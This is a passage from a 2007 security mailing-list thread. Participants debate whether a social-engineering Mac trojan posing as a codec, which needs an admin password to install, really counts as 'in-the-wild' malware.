 does not need to be entered each time?

 Gadi Evron mailto:[EMAIL PROTECTED] wrote:
  On Wed, 31 Oct 2007, Hanz Makmur wrote:
  Yap. Social Engineering type of program is hard to deal with.
 
  I don't see this as big as the subject would like it to be: mac
  trojan
  in-the-wild.
 
  'Wild' imho means out of control. An SE program requires many clicks. To
  tame it even more, by default, on the Mac, unlike Windows, one needs
  to enter the administrator password to activate this type of program.
  Hidden network activities are also tamed even more in Leopard (v.10.5).
 
  in-the-wild in this context means what it means for years now in our
  realm:
  Currently actively exploited.
 
 
 
 
  Hanz
 
  On Oct 31, 2007, at 10:09 PM, Eduardo Tongson wrote:
 
  This is an SE type of malware. Codecs require installation so it
  needs root/admin privileges.
 